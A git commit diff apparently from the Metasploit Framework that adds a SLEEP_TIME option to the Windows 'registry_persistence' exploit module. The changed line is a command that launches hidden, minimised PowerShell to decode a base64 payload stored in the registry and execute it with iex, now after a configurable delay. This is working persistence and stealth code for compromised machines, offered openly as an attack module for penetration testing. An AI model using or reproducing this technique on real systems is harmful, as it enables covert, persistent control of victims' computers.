Land rapid7#6252, Add SLEEP_TIME option for registry_persistence.rb

wchen-r7 · wchen-r7 · commit fc16a904a361 · 2015-11-18T15:32:19.000-06:00
diff --git a/modules/exploits/windows/local/registry_persistence.rb b/modules/exploits/windows/local/registry_persistence.rb
@@ -53,6 +53,8 @@ def initialize(info = {})
         [false, 'The name to use for the \'Run\' key. (Default: random)' ]),
       OptBool.new('CREATE_RC',
         [false, 'Create a resource file for cleanup', true]),
+      OptInt.new('SLEEP_TIME',
+        [false, 'Amount of time to sleep (in seconds) before executing payload. (Default: 0)', 0]),
     ], self.class)
   end
 
@@ -66,7 +68,7 @@ def generate_payload_blob
   end
 
   def generate_cmd(root_path, blob_key_name, blob_key_reg)
-    cmd = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}'))))\""
+    cmd = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"sleep #{datastore['SLEEP_TIME']}; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}'))))\""
     return cmd
   end
 
